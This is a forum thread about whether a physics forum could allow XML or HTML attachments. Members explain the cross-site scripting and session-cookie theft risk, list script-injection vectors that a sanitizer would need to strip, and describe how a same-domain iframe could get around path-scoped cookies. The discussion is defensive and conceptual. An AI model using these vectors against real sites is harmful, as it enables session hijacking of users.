Can we upload XML?

honestrosewater

I just went to attach an XML file to a post and found out that neither it nor HTML is allowed. Has anyone asked for this yet? I think it would be nice (obviously ).

-Job-

That would be a security hole. If you were able to upload an html/xml page then the uploaded html page, residing on the physicsforums.com server, would have access to site cookies and so might be used for cross-site scripting and stealing of sessions.

honestrosewater

Oh. Hm. Well, attachments have to be approved anyway, so is there an easy way to check such files as part of the approval process?

The problem is that browsers will execute scripts in html and xml files, is that it? Are you just worried about client-side scripting? If that's it, is there another way to include scripts in an html or xml file other than with html's script element?

You'd want to also check any files that get fetched and included. Perhaps there is a safe way to just render the page and complain if it does something bad?

Or can you just store them somewhere special and restrict them that way?

It's not a big deal. I'm just wondering. If I could help at all, I'd be glad to.

Evo

When you go to attachments, it lists the approved file types.

mattmns

You could always upload the files as .txt files (XML is just text right?), and have the person/s change the extensions themselves (just go to notepad and save the file with the desired extension).

loseyourname

Just post the code and we'll figure out what the file was supposed to be.

honestrosewater

Right, I'm wondering if xml and html can be added to the list.

Yeah, that's probably what I'll do if this doesn't work.

honestrosewater

I don't understand. The file is XML. This particular file is just a list, but the list has 330 items, so I didn't want to post it as a regular post. I had compiled the list in XML anyway, so I was just going to attach the file (well, I added some inline CSS to it so it would be prettier too).

loseyourname

What I meant was that readers could parse the code in their heads and infer what the list would look like. dduardo used to joke about doing that using a plain-text browser that didn't parse any code. I was also, of course, joking. Although it is certainly possible to parse code in one's head, I doubt anyone really wants to.

But, if you want, you can always post the file somewhere else and post a link to it here. Free web space that your ISP gives you is useful for these types of dilemmas. I'm sure you can figure some way to make the list using an approved file type, too.

honestrosewater

You really should warn people when you're doing that.

Moridin

The most obvious solution would be to use an external filehost.

honestrosewater

Right, and that option is also there for the other types of files that PF does allow. Storing it on PF is more convenient. Also, I tried two sites and searched for more, and none of them gave direct links, so you can't just visit the URL and render the file. You have to save it locally (after possibly waiting for a timer and watching ads). Most image-hosting sites don't make you do that.

-Job-

There's the script tag, iframes and framesets, links that start with "javascript:", events such as onload, onmouseover, etc. All of these would need to be parsed out.

Moridin

There are several filehosts that do not require you to watch ads before downloading, such as

http://fileupyours.com/

I've used them for a while without any problems.

honestrosewater

Ah, okay then. Just out of curiosity, is there a way to simply tell a script that the cookies don't exist?

I saw the HttpOnly flag, but FF (for one) won't support it until version 3.

Also, is a cookie's host (the "author" of the cookie or whatever) identified by only the domain name or does it use fully-qualified domain name or does it end up using IP addresses, does it keep track of ports, etc.? I'm mildly confused about how this all works, but is there no way to do it with, say, virtual hosting and subdomains or something? Just store the suspect files in a different document root? I don't care about actually doing it. I'm just wondering if there is a solution.

Thanks for the link, Moridin.

Moonbear

I don't understand. If it's just a list, why can't you put it in a text file? What advantage would using XML give you that would justify using it here? I'm not totally sure what one does with XML anyway. As for HTML, it should be pretty obvious that there is just too much someone can do with it that would be malicious to allow that here. You have to remember that for a moderator to decide to approve an attachment, we have to view it first, on our own computers, and we're certainly not going to risk our computers just for some fancy bells and whistles in posts. As it is, I don't even like that zip files are allowed because you just never know what's in one of those until it's unzipped. We toss those around like hot potatoes, seeing who is bravest to download and open to approve the attachment.

-Job-

When you set a cookie by default the cookie's domain is the domain the script came from, but you can specify a path so that only scripts in that path have access to the cookie. PF's cookie is global to the domain because there are many forum folders that need access to the cookie.

Even if you move PF to /vb and create an upload folder at /upload and set the cookie's path to www.physicsforums.com/vb, though the html file in the upload folder doesn't have direct access to the site's cookies, since it's still in the same domain it would be able to access the cookie via an iframe pointing to the main PF page. A page can access and manipulate scripts on a page in one of its iframes as long as both pages are in the same domain, which is the case. Browser security varies of course.